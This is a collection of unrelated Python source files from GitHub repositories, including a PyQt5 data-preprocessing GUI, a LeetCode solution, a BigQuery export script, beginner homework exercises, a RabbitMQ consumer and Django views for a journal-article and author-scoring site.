range(parent_item.childCount()):\n            child = parent_item.child(i)\n            grand_children = child.childCount()\n            if grand_children > 0:\n                recurseclear(child)\n            child.setCheckState(0, Qt.Unchecked)\n\n    def recurse(parent_item, setting, idx=0):\n        for i in range(parent_item.childCount()):\n            child = parent_item.child(i)\n            grand_children = child.childCount()\n            try:\n                if grand_children > 0:\n                    recurse(child, setting, idx + 1)\n                elif child.text(0) == setting[idx]:\n                    child.setCheckState(0, Qt.Checked)\n            except IndexError:\n                pass\n\n    origin.settings = origin.savesettings\n    recurseclear(origin.selecttree.invisibleRootItem())\n    for setting in origin.settings:\n        recurse(origin.selecttree.invisibleRootItem(), setting.split('.'))\n\n\ndef ChangeEDFReaderStart(origin):\n    # Called when the user wants to change the trial separator event, or when it is needed\n    val = QInputDialog.getText(origin, 'EDF READER SETTINGS : Trial Separator Event', 'Insert which event is used to define the beginning of a single trial')\n    if val[1] is True:\n        origin.edfstart = val[0]\n\n\ndef ChangeEDFReaderEvents(origin):\n    # Called when the user wants to change the events that need to be found in the edf file or when needed\n    val = QInputDialog.getText(origin, 'EDF READER SETTINGS : Event list', 'List of User-defined events in the edf file (format example= \"event0,event1,event2,...\")')\n    if val[1] is True:\n        origin.edfevents = val[0].split(',')\n\n\ndef SavePreset(origin, close=False):\n    # Save a preset of settings, containing the loaded data, metadata, edfreader settings, and the selected variables\n    # The file is saved as a JSON, either a user-made one, or a hidden one written when the program is closed\n    SaveSettings(origin)\n    preset = dict()\n    preset['settings'] = origin.settings\n    preset['mdatafiles'] = origin.mdatafiles\n    preset['datafiles'] = origin.datafiles\n    preset['edfstart'] = origin.edfstart\n    preset['edfevents'] = origin.edfevents\n    if close is True:\n        file = open('presets/.lastpreset.json', 'w')\n    else:\n        dialog = QFileDialog.getSaveFileName(directory='presets', filter='JavaScript Object Notation(*.json)')\n        if dialog[0]:\n            file = open(dialog[0], 'w')\n        else:\n            return\n    file.write(json.dumps(preset, sort_keys=True, indent=4))\n    file.close()\n\n\ndef 
LoadPreset(origin, boot=False):\n # This reads a preset of settings, either user made, or the invisible one made when the programm exits\n if boot is True:\n try:\n file = open('presets/.lastpreset.json')\n preset = JsonLoadsCheck(file.read(), origin)\n except FileNotFoundError:\n preset = {}\n else:\n file = open(QFileDialog.getOpenFileName(directory='presets', filter='JavaScript Object Notation (*.json)')[0], 'r')\n preset = JsonLoadsCheck(file.read(), origin)\n\n try:\n origin.mdatafiles = preset['mdatafiles']\n except KeyError:\n origin.mdatafiles = ()\n try:\n origin.datafiles = preset['datafiles']\n except KeyError:\n origin.datafiles = ()\n try:\n origin.edfstart = preset['edfstart']\n except KeyError:\n origin.edfstart = ()\n try:\n origin.edfevents = preset['edfevents']\n except KeyError:\n origin.edfevents = ()\n OpenMetadata(origin, True)\n OpenFile(origin, True)\n try:\n origin.savesettings = preset['settings']\n except KeyError:\n origin.savesettings = []\n LoadSettings(origin)\n\n\ndef TrialTag(origin):\n elem = origin.prevtree.selectedItems()[0]\n if not elem.parent():\n val = QInputDialog.getText(origin, 'TRIAL TAG', 'Insert a comment to tag the event, nothing to un-tag')\n if val[1] is False:\n return\n else:\n idx = origin.prevtree.invisibleRootItem().indexOfChild(elem)\n origin.CleanDATA[idx]['tag'] = val[0]\n for i in range(elem.childCount()):\n child = elem.child(i)\n if child.text(0) == 'tag':\n child.child(0).setText(0, val[0])\n\n\ndef SetTreeSettings(origin):\n # This function clears and then fills the variable selection tree\n def SubTreeSettings(origin, lst, parent):\n child = QTreeWidgetItem(parent)\n child.setText(0, lst)\n child.setFlags(child.flags() | Qt.ItemIsTristate | Qt.ItemIsUserCheckable)\n child.setCheckState(0, Qt.Unchecked)\n\n SaveSettings(origin)\n origin.selecttree.clear()\n headerItem = QTreeWidgetItem()\n item = QTreeWidgetItem()\n for k in origin.variables:\n parent = QTreeWidgetItem(origin.selecttree)\n parent.setText(0, k)\n parent.setFlags(parent.flags() | Qt.ItemIsTristate | Qt.ItemIsUserCheckable)\n parent.setCheckState(0, Qt.Unchecked)\n for j in origin.variables[k]:\n if (list(origin.variables[k].keys()) != ['desc', 'func', 'name', 'reqs']):\n SubTreeSettings(origin, j, parent)\n LoadSettings(origin)\n\n\ndef OpenDataManager(origin):\n # This function is used when the user wants to access the data manager windows\n # It either creates it, or places it in front of the main window\n if origin.datamanageropen is False:\n origin.datamanageropen = True\n origin.datamanager = (DataManager(origin))\n else:\n origin.datamanager.hide()\n origin.datamanager.show()\n\n\ndef UpdateDataLists(manager, origin):\n # This functions updates the loaded data lists in the data manager, it uses the dict keys of DATA and METADATA\n if origin.datamanageropen is False:\n return()\n manager.datalist.clear()\n manager.metadatalist.clear()\n for k in DATA:\n manager.datalist.insertItem(0, k)\n for k in METADATA:\n manager.metadatalist.insertItem(0, k)\n\n\ndef DeleteData(manager, origin):\n # This function removes loaded data that is selected in the data manager tree\n elems = list()\n for k in manager.datalist.selectedItems():\n elems.append(k.text())\n for k in elems:\n del DATA[k]\n UpdateDataLists(manager, origin)\n\n\ndef DeleteMetadata(manager, origin):\n # This function removes loaded metadata that is selected in the data manager tree\n elems = list()\n for k in manager.metadatalist.selectedItems():\n elems.append(k.text())\n for k in elems:\n del 
METADATA[k]\n UpdateDataLists(manager, origin)\n\n\nclass DataManager(QMainWindow):\n # The Data manager windows is a small windows that is used to check what is the currently loaded data and metadata\n # It does contains a small amount of push buttons, useful for deletion and addition of datafiles\n def __init__(self, origin):\n QWidget.__init__(self)\n self.area = QWidget()\n self.setWindowTitle(\"PREPROGUI Data Manager\")\n self.setCentralWidget(self.area)\n self.layt = QGridLayout()\n self.area.setLayout(self.layt)\n self.InitDataLists(origin)\n self.InitButtons(origin)\n self.show()\n\n def InitDataLists(self, origin):\n self.datalabel = QLabel('Loaded Data List')\n self.metadatalabel = QLabel('Loaded Metadata List')\n self.layt.addWidget(self.datalabel, 0, 0, 1, 2)\n self.layt.addWidget(self.metadatalabel, 0, 2, 1, 2)\n self.datalist = QListWidget()\n self.metadatalist = QListWidget()\n self.datalist.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.metadatalist.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.layt.addWidget(self.datalist, 1, 0, 1, 2)\n self.layt.addWidget(self.metadatalist, 1, 2, 1, 2)\n UpdateDataLists(self, origin)\n\n def InitButtons(self, origin):\n self.deldata = QPushButton('Delete Selected Data')\n self.adddata = QPushButton('Add Data')\n self.delmetadata = QPushButton('Delete Selected Metadata')\n self.addmetadata = QPushButton('Add Metadata')\n self.deldata.clicked.connect(lambda: DeleteData(self, origin))\n self.adddata.clicked.connect(lambda: OpenFile(origin))\n self.delmetadata.clicked.connect(lambda: DeleteMetadata(self, origin))\n self.addmetadata.clicked.connect(lambda: OpenMetadata(origin))\n self.layt.addWidget(self.deldata, 2, 0)\n self.layt.addWidget(self.adddata, 2, 1)\n self.layt.addWidget(self.delmetadata, 2, 2)\n self.layt.addWidget(self.addmetadata, 2, 3)\n\n\nclass MainWindow(QMainWindow):\n # Init a new window and all the PyQt5 widgets required to run the GUI\n def __init__(self):\n def Start(self):\n LoadPreset(self, True)\n self.show()\n\n QWidget.__init__(self)\n self.area = QWidget()\n self.resize(1280, 800)\n self.setWindowTitle(\"PREPROGUI\")\n self.setCentralWidget(self.area)\n\n self.CacheDATA = []\n self.CleanDATA = []\n self.InitLayouts()\n self.InitSettings()\n self.InitPreview()\n self.InitPlot()\n self.InitMenu()\n\n Start(self)\n\n def closeEvent(self, event):\n SavePreset(self, close=True)\n # reply = QMessageBox.question(self, 'Window Close', 'Are you sure you want to close the window?',\n # \t\tQMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n # if reply == QMessageBox.Yes:\n # \tevent.accept()\n # pront('Window closed')\n # else:\n # \tevent.ignore()\n\n def InitLayouts(self):\n self.layt = QGridLayout()\n self.area.setLayout(self.layt)\n self.settingslayt = QVBoxLayout()\n self.previewlayt = QGridLayout()\n self.plotlayt = QVBoxLayout()\n self.layt.addLayout(self.settingslayt, 0, 1)\n self.layt.addLayout(self.previewlayt, 0, 2)\n self.layt.addLayout(self.plotlayt, 0, 3, 1, 3)\n self.log = QPlainTextEdit()\n self.log.setReadOnly(True)\n\n def InitSettings(self):\n\n # User selection Groupbox\n groupbox = QGroupBox()\n layt = QGridLayout()\n groupbox.setLayout(layt)\n layt.setSpacing(3)\n\n # Selection Tree Widget\n with open('variables.json', 'r') as file:\n self.safevariables = JsonLoadsCheck(file.read(), self)\n self.variables = copy.copy(self.safevariables)\n self.selecttree = QTreeWidget()\n SetTreeSettings(self)\n self.settingslayt.addWidget(self.selecttree)\n\n # Initializing some variables 
used later\n self.edfstart = ''\n self.edfevents = []\n self.settings = []\n self.savesettings = []\n self.mdatafiles = ()\n self.datafiles = ()\n\n # Apply & Reset Buttons\n pushreset = QPushButton('Clear Everything')\n pushapply = QPushButton('Apply')\n pushreset.clicked.connect(lambda: PushReset(self))\n pushapply.clicked.connect(lambda: PushApply(self))\n layt.addWidget(pushreset, 2, 0)\n layt.addWidget(pushapply, 2, 1)\n\n self.settingslayt.addWidget(groupbox)\n\n def InitPreview(self):\n self.prevtree = QTreeWidget()\n self.prevtree.itemDoubleClicked.connect(lambda: TrialTag(self))\n FillTree(self.prevtree, self.CleanDATA)\n self.prevtree.collapseAll()\n self.previewlayt.addWidget(self.prevtree, 0, 0, 1, 1)\n self.previewlayt.addWidget(self.log, 1, 0, 40, 1)\n\n def InitPlot(self):\n self.check = False\n self.htmlreader = QWebEngineView()\n self.htmlreader.setFixedSize(600, 600)\n self.plot_variables = list()\n\n groupbox = QGroupBox('Axis Selection')\n groupbox.setFixedSize(600, 50)\n self.index = QSpinBox()\n self.index.setMinimum(1)\n self.index.setMaximumWidth(60)\n self.index.setMaximum(2)\n self.index.setWrapping(True)\n self.index.valueChanged.connect(lambda checked: UpdatePlot(self))\n\n self.dpdw1 = QComboBox()\n self.dpdw2 = QComboBox()\n self.dpdw3 = QComboBox()\n self.flipy = QCheckBox('Flip Y')\n\n layt = QHBoxLayout()\n layt.setContentsMargins(3, 3, 3, 3)\n groupbox.setLayout(layt)\n layt.addWidget(QLabel('Trial Index'))\n layt.addWidget(self.index)\n layt.addWidget(QLabel('X-Axis'))\n layt.addWidget(self.dpdw1)\n layt.addWidget(QLabel('Y-Axis'))\n layt.addWidget(self.dpdw2)\n layt.addWidget(QLabel('Color'))\n layt.addWidget(self.dpdw3)\n layt.addWidget(self.flipy)\n self.lock = False\n self.dpdw1.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.dpdw2.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.dpdw3.currentTextChanged.connect(lambda checked: UpdatePlot(self))\n self.flipy.stateChanged.connect(lambda checked: UpdatePlot(self))\n\n self.plotlayt.addWidget(self.htmlreader)\n self.plotlayt.addWidget(groupbox)\n\n def InitMenu(self):\n self.datamanager = 0\n self.datamanageropen = False\n menubar = self.menuBar()\n\n filemenu = menubar.addMenu('File')\n placeholder = filemenu.addAction('Open Datafiles (Clear Data)')\n placeholder.triggered.connect(lambda: OpenFile(self, clean=True))\n placeholder = filemenu.addAction('Add Datafiles')\n placeholder.triggered.connect(lambda: OpenFile(self))\n filemenu.addSeparator()\n placeholder = filemenu.addAction('Add Metadata')\n placeholder.triggered.connect(lambda: OpenMetadata(self))\n placeholder = filemenu.addAction('Clear Metadata')\n placeholder.triggered.connect(lambda: ResetMetadata(self))\n filemenu.addSeparator()\n placeholder = filemenu.addAction('Data Manager')\n placeholder.triggered.connect(lambda: OpenDataManager(self))\n\n exportmenu = menubar.addMenu('Export')\n placeholder = exportmenu.addAction('Export Data Structure')\n placeholder.triggered.connect(lambda: Export(self))\n\n edfreadermenu = menubar.addMenu('EDF Reader')\n placeholder = edfreadermenu.addAction('Change EDF Reader trial separator')\n placeholder.triggered.connect(lambda: ChangeEDFReaderStart(self))\n placeholder = edfreadermenu.addAction('Change EDF Reader events')\n placeholder.triggered.connect(lambda: ChangeEDFReaderEvents(self))\n\n presetmenu = menubar.addMenu('Preset')\n placeholder = presetmenu.addAction('Save Preset')\n placeholder.triggered.connect(lambda: SavePreset(self))\n placeholder = 
presetmenu.addAction('Load Preset')\n        placeholder.triggered.connect(lambda: LoadPreset(self))\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\n# Create the parser\n#my_parser = argparse.ArgumentParser(description='List the content of a folder')\n\n# Add the arguments\n#my_parser.add_argument('-n',\n#                       action=\"store_true\"\n#                       help='Activate the nogui option')\n\n# Execute the parse_args() method\n#args = my_parser.parse_args()\n#if args.nogui:\n#    print('YES')\napp = QApplication(sys.argv)\nex = MainWindow()\nex.show()\nsys.exit(app.exec_())\n","repo_name":"tprzybyl/preprogui","sub_path":"PReProGui.py","file_name":"PReProGui.py","file_ext":"py","file_size_in_byte":39645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21149625474","text":"class Solution:\n    def numberOfWeakCharacters(self, properties: List[List[int]]) -> int:\n        # Time Complexity: O(N log N)\n        # Space Complexity: O(N)\n\n        properties.sort(key=lambda prop: (prop[0], -prop[1]))\n        frontier = []\n        ret = 0\n\n        for att, defend in properties:\n            # Add point to frontier:\n            if frontier and frontier[-1][0] == att:\n                cnt = 1\n                stack = frontier[-1][1]\n\n                while stack and stack[-1][0] <= defend:\n                    cnt += stack.pop()[1]\n\n                stack.append((defend, cnt))\n            else:\n                frontier.append((att, [(defend, 1)]))\n\n            top_stack = frontier.pop()\n\n            while frontier:\n                cand_stack = frontier[-1][1]\n\n                if not cand_stack:\n                    frontier.pop()\n                elif cand_stack[-1][0] >= defend:\n                    break\n                else:\n                    ret += cand_stack.pop()[1]\n\n            # re-add top-of-frontier\n            frontier.append(top_stack)\n\n        return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1996. The Number of Weak Characters in the Game/Solution2.py","file_name":"Solution2.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"1544649991","text":"################################## Data Pipeline Google Cloud Platform to Python ####################################### \r\n\r\n# Connects the Google Analytics data imported into GCP BigQuery Storage to a Python interface\r\n# so that the queried data can be fed to exploratory analysis methods not feasible in SQL\r\n\r\nimport os; os.chdir('C:/Users/marvin/Desktop/SQL BigQuery')\r\n\r\nimport numpy as np ; import pandas as pd ; from google.cloud import bigquery\r\n\r\n# Create a GCP service account: https://cloud.google.com/docs/authentication/production\r\n# Authenticate the account in Python by adding the path of the JSON file downloaded locally after creating the key\r\n\r\nclient = bigquery.Client.from_service_account_json(\r\njson_credentials_path='data_pipeline-bbc9aec8eae9.json', \r\nproject='data_pipeline')\r\n\r\n# SQL query\r\n\r\nquery = \"\"\"\r\nSELECT fullvisitorid AS ID_Visitor,SUM(totals.visits) AS Visits \r\nFROM `bigquery-public-data.google_analytics_sample.ga_sessions_*` \r\nGROUP BY fullvisitorid ORDER BY Visits DESC \"\"\"\r\n\r\nquery_results = client.query(query) ; query_results = query_results.result()\r\n
# Results table\r\nID_Visitor = [] ; Visits = []\r\n\r\nfor row in query_results: \r\n    ID_Visitor.append(row[0]) \r\n    Visits.append(row[1])\r\n\r\nBigQuery_table = { 'ID_Visitor' : ID_Visitor, 'Visits' : Visits } ; BigQuery_table = pd.DataFrame(BigQuery_table)\r\n\r\n# This table can now be fed to statistical tests or machine learning models in order to perform,\r\n# for example, A/B testing or predictive analytics (see the Data-Mining & Machine Learning repositories)\r\n\r\n# After the analyses, export the results back to Google Cloud Platform BigQuery Storage\r\n# to visualize them better in BI data-visualization tools such as Tableau or Data Studio\r\nfrom pandas.io import gbq\r\nBigQuery_table.to_gbq(destination_table='test.BigQuery_table', project_id='data_pipeline', if_exists='replace')\r\n# copy and paste the authorization code into the console\r\n","repo_name":"MarvinEdorh/Data-Engineering","sub_path":"ETL_Python_BigQuery.py","file_name":"ETL_Python_BigQuery.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70601292268","text":"##################################################### \n# CS 31, Prof. Muldrow\n# Name: Jhon Trujillo\n# Assignment: Ch2_HW\n# Due Date: 02.21.21\n# ####################################################\n\n# 12. Stock Transaction Program\n\nnum_Shares = 2000 # num of stocks purchased\nstock_Price = 40.00\npurchase_Amount = num_Shares * stock_Price \np_commission = purchase_Amount * 0.03 # stock purchase commission\nnet_Purchase = purchase_Amount - p_commission\n\n ## two weeks later..\n\nsell_Price = 42.75 # stock price per share sold\nsell_Amount = num_Shares * sell_Price\ns_commission = (num_Shares * sell_Price) * 0.03\n\nprint(f'Total Amount \"Joe\" paid for the stock: ${purchase_Amount:,.2f}')\nprint(f'Commission Amount \"Joe\" paid for the purchased stock: ${p_commission:,.2f}')\nprint(f'$ Amount sold by \"Joe\" for the stock (pre-commission): ${sell_Amount:,.2f}')\nprint(f'Commission paid for the sold stock: ${s_commission:,.2f}')\n\nnet_Profit = (sell_Amount - purchase_Amount) - (p_commission + s_commission)\nprint(f'Net profit for sold stock (after commissions): ${net_Profit:,.2f}')\n\nif net_Profit > 0:\n    print(f\"Joe made a Net Profit of ${net_Profit:,.2f} :D\")\nelse: \n    print(\"Joe made NO MONEY$ :(\\n\")\n\n\n# 13. Planting Grapevines\n\nR = float(input(\"Enter length of row (in feet): \"))\nE = float(input(\"Enter the amount of space (in feet), used by an end-post assembly: \"))\nS = float(input(\"Enter the space between the vines (in feet): \"))\n\nV = (R - 2*E)/S\n\nprint(f\"{V:.2f} grapevines fit in this row.\")\nprint()\n\n\n# 14. Compound Interest\n\nP = float(input(\"Enter the amount of the principal originally deposited into account: \"))\nrate = float(input(\"Enter interest rate (as a %): \"))\nr = rate / 100\nn = float(input(\"Enter # of times per year that the interest is compounded (e.g. if interest is compounded monthly; enter 12, if quarterly; enter 4.) 
\"))\nt = float(input(\"Enter # of years the account will be left to earn interest: \"))\n\nA = P*(1 + (r/n)) ** (n*t)\n\nprint(f\"Total amount of money in the account after {t} year(s): ${A:.2f}\")","repo_name":"amriikk/CS31-Python","sub_path":"HW/Ch2HW.py","file_name":"Ch2HW.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28075407080","text":"\nimport json\nfrom desafio.extensions import cache\nfrom desafio.currency.models import RequestCurrencyQuotationParam\nfrom desafio.currency.services import ServiceQuoteCurrencyPrice\n\n\nclass ConsumerCurrency():\n def __init__(self, channel):\n self.channel = channel\n self.exchange = 'topic_priority'\n self.channel.exchange_declare(\n exchange='topic_priority', exchange_type='topic')\n self.service_currency = ServiceQuoteCurrencyPrice()\n\n def receive_quotation_between_period_and_get_relation_currencys(self, binding_key, queue_name):\n self.channel.queue_declare(queue_name)\n self.channel.queue_bind(exchange=self.exchange,\n queue=queue_name, routing_key=binding_key)\n\n def callback(ch, method, properties, body):\n rq_currency = json.loads(body)\n request_params = RequestCurrencyQuotationParam(\n rq_currency['from_simbol'], rq_currency['to_simbol'],\n rq_currency['initial_date'], rq_currency['final_date'])\n result = self.service_currency.get_relation_ratio_between_currencies_in_given_period(\n request_params)\n key_period_request = f\"{rq_currency['from_simbol']}-{rq_currency['to_simbol']}-{rq_currency['initial_date']}-{rq_currency['final_date']}\"\n\n cache.set(key_period_request, result, timeout=30*60)\n self.channel.basic_ack(delivery_tag=method.delivery_tag)\n\n self.channel.basic_qos(prefetch_count=1)\n self.channel.basic_consume(\n queue=queue_name, on_message_callback=callback)\n print(' [*] Waiting for worker currencys. 
To exit press CTRL+C')\n\n self.channel.start_consuming()\n","repo_name":"Diego07101985/desafio-cortex","sub_path":"desafio/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71259153388","text":"import os\nmyStr = \"\"\nfor i in range(1, 10):\n # f = open(f\"Assignmet {i}.py\", \"a\")\n # f.write(\"\")\n # f.close()\n # os.rename(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\Assignmet {i}.py\", f\"Assignment {i}.py\")\n MyAssignment = open(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\Assignment {i}.py\", \"r\")\n myStr = myStr +f\"\\n Assignment {i} \\n \\n\" f\"{MyAssignment.read()} \\n \\n\"\n\nAllAssignament = open(f\"E:\\Collage Work\\Programming\\Python\\Sem 2\\All Assignment.txt\", \"a\")\nAllAssignament.write(myStr)\n","repo_name":"Dhiraj275/collage-assiginment","sub_path":"Python/Sem 2/FileMaker.py","file_name":"FileMaker.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70510767789","text":"import json\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import render\r\nfrom django.db.models import Sum, Q\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.views.decorators.http import require_POST\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\r\nfrom .models import Article, Author, Author_Article, Journal\r\nfrom .download import search_query, download_article, download_author\r\n\r\n\r\n@csrf_exempt\r\ndef First_author(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponseRedirect('/famine/account/login')\r\n First_authors, journals, default_dict, js_dict, journal_lst, page, order = search_query(request)\r\n if order == '1':\r\n First_authors = First_authors.order_by('-article__pmid')\r\n else:\r\n First_authors = First_authors.order_by('article__pmid')\r\n\r\n if request.GET.get('download') == '1':\r\n output = download_article(First_authors)\r\n response = HttpResponse(content_type='application/vnd.ms-excel')\r\n response['Content-Disposition'] = 'attachment;filename=famine_result.xls'\r\n response.write(output.getvalue())\r\n\r\n return response\r\n\r\n paginator = Paginator(First_authors, 20, 10)\r\n try:\r\n First_authors_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n First_authors_page = paginator.page(1)\r\n except EmptyPage:\r\n First_authors_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/first.html\",\r\n {\"First_authors\": First_authors_page,\r\n \"count\": len(First_authors),\r\n \"journals\": journals,\r\n \"dict\": default_dict,\r\n \"js_dict\": json.dumps(js_dict),\r\n \"journal_lst\": journal_lst[:-2]})\r\n\r\n\r\n@login_required\r\ndef Article_title(request):\r\n articles = Article.objects.all()\r\n paginator = Paginator(articles, 50, 20)\r\n page = request.GET.get('page')\r\n try:\r\n articles_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n articles_page = paginator.page(1)\r\n except EmptyPage:\r\n articles_page = paginator.page(paginator.num_pages)\r\n return render(request, \"Article/titles.html\",\r\n {\"articles\": articles_page, \"count\": len(articles)})\r\n\r\n\r\n@login_required\r\ndef Article_detail(request, article_pmid):\r\n article = 
Article.objects.get(pmid=article_pmid)\r\n ranks = Author_Article.objects.filter(article=article_pmid)\r\n return render(request, \"Article/content.html\",\r\n {\"article\": article, \"ranks\": ranks})\r\n\r\n@csrf_exempt\r\n@login_required\r\ndef Author_detail(request, author_id):\r\n author = Author.objects.get(id=author_id)\r\n articles = Author_Article.objects.filter(author=author_id)\r\n if request.method == 'GET':\r\n articles_for_score = articles.filter(Q(first='Yes') | Q(cofirst='Yes'))\r\n score = 0\r\n for article in articles_for_score:\r\n score += article.article.journal.ifactor\r\n\r\n return render(request, \"Article/author.html\",\r\n {\"author\": author, \"articles\": articles, \"score\": score})\r\n\r\n if request.method == 'POST':\r\n email = request.POST.get('email')\r\n if email == 'None':\r\n email = None\r\n if email:\r\n same_author_obj = Author.objects.filter(~Q(id=author.id), name=author.name, email=email)\r\n if same_author_obj:\r\n same_author = same_author_obj[0]\r\n same_author_articles = Author_Article.objects.filter(author=same_author)\r\n same_author_article = same_author_articles[0]\r\n this_author_articles = Author_Article.objects.filter(author=author)\r\n this_author_article = this_author_articles[0]\r\n if same_author_article.article.pubdate > this_author_article.article.pubdate:\r\n for article in this_author_articles:\r\n article.author = same_author\r\n article.save()\r\n author.delete()\r\n return HttpResponseRedirect('/famine/author/'+str(same_author.id))\r\n else:\r\n for article in same_author_articles:\r\n article.author = author\r\n article.save()\r\n same_author.delete()\r\n return HttpResponseRedirect('/famine/author/'+str(author.id))\r\n else:\r\n author.email = email\r\n author.save()\r\n\r\n return HttpResponseRedirect('/famine/author/'+str(author.id))\r\n\r\n@csrf_exempt\r\n@require_POST\r\n@login_required\r\ndef get_result(request, article_pmid):\r\n cofirst = request.POST.getlist('cofirst')\r\n chinese = request.POST.getlist('chinese')\r\n ranks = Author_Article.objects.filter(article=article_pmid)\r\n cofirst_ = list(str(author.author.id) for author in ranks)\r\n sub = list(i for i in cofirst_ if i not in cofirst)\r\n chinese_sub = list(i for i in cofirst_ if i not in chinese)\r\n author_1 = ranks.get(rank=1)\r\n\r\n for author_id in chinese:\r\n author = Author.objects.get(id=author_id)\r\n author.chinese = 'Yes'\r\n author.save()\r\n\r\n for author_id in chinese_sub:\r\n author = Author.objects.get(id=author_id)\r\n author.chinese = 'No'\r\n author.save()\r\n\r\n if len(cofirst) > 1:\r\n author_1.cofirst = 'Yes'\r\n author_1.save()\r\n for author_id in cofirst:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = 'Yes'\r\n author.save()\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = None\r\n author.save()\r\n elif len(cofirst) == 1:\r\n author = ranks.get(author=cofirst[0])\r\n if author.first == 'Yes':\r\n author_1.cofirst = None\r\n author_1.save()\r\n else:\r\n author.cofirst = 'Yes'\r\n author.save()\r\n author_1.cofirst = 'Yes'\r\n author_1.save()\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n if author.first == 'Yes':\r\n continue\r\n author.cofirst = None\r\n author.save()\r\n else:\r\n for author_id in sub:\r\n author = ranks.get(author=author_id)\r\n author.cofirst = None\r\n author.save()\r\n\r\n return 
HttpResponseRedirect('/famine/title/'+article_pmid)\r\n\r\n\r\n@login_required\r\ndef journal(request, article_journal_name):\r\n journal = Journal.objects.get(name=article_journal_name)\r\n articles = Article.objects.filter(journal=journal)\r\n article_authors_list = list()\r\n for article in articles:\r\n first_author = Author_Article.objects.get(article=article, first='Yes')\r\n cofirst_author = Author_Article.objects.filter(article=article, cofirst='Yes')\r\n article_authors_list.append([article, first_author, cofirst_author])\r\n\r\n paginator = Paginator(article_authors_list, 20, 10)\r\n page = request.GET.get('page')\r\n try:\r\n article_authors_list_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n article_authors_list_page = paginator.page(1)\r\n except EmptyPage:\r\n article_authors_list_page = paginator.page(paginator.num_pages)\r\n return render(request, \"Article/journal.html\",\r\n {\"article_authors_list\": article_authors_list_page,\r\n \"journal\": journal, \"count\": len(articles)}) \r\n\r\n\r\n@login_required\r\ndef topic(request, article_subject):\r\n articles = Article.objects.filter(subject=article_subject)\r\n article_authors_list = list()\r\n for article in articles:\r\n first_author = Author_Article.objects.get(article=article, first='Yes')\r\n cofirst_author = Author_Article.objects.filter(article=article, cofirst='Yes')\r\n article_authors_list.append([article, first_author, cofirst_author])\r\n\r\n paginator = Paginator(article_authors_list, 20, 10)\r\n page = request.GET.get('page')\r\n try:\r\n article_authors_list_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n article_authors_list_page = paginator.page(1)\r\n except EmptyPage:\r\n article_authors_list_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/topic.html\",\r\n {\"article_authors_list\": article_authors_list_page,\r\n \"article_subject\": article_subject,\r\n \"count\": len(articles)})\r\n\r\n\r\n@csrf_exempt\r\n@login_required\r\ndef author(request):\r\n First_authors, journals, default_dict, js_dict, journal_lst, page, order = search_query(request)\r\n\r\n authors_info = list()\r\n if order == '1':\r\n authors_score = First_authors.values('author').annotate(score=Sum('article__journal__ifactor')).order_by('-score')\r\n else:\r\n authors_score = First_authors.values('author').annotate(score=Sum('article__journal__ifactor')).order_by('score')\r\n for au in authors_score:\r\n author = Author.objects.get(id=au['author'])\r\n score = round(au['score'], 2)\r\n articles = First_authors.filter(author=author)\r\n authors_info.append([author, score, articles])\r\n\r\n if request.GET.get('download') == '1':\r\n output = download_author(authors_info)\r\n response = HttpResponse(content_type='application/vnd.ms-excel')\r\n response['Content-Disposition'] = 'attachment;filename=famine_result.xls'\r\n response.write(output.getvalue())\r\n\r\n return response\r\n\r\n paginator = Paginator(authors_info, 20, 10)\r\n try:\r\n authors_info_page = paginator.page(page)\r\n except PageNotAnInteger:\r\n authors_info_page = paginator.page(1)\r\n except EmptyPage:\r\n authors_info_page = paginator.page(paginator.num_pages)\r\n\r\n return render(request, \"Article/score.html\",\r\n {\"authors_info\": authors_info_page,\r\n \"journals\": journals,\r\n \"count\": len(authors_info),\r\n \"dict\": default_dict,\r\n \"js_dict\": json.dumps(js_dict),\r\n \"journal_lst\": 
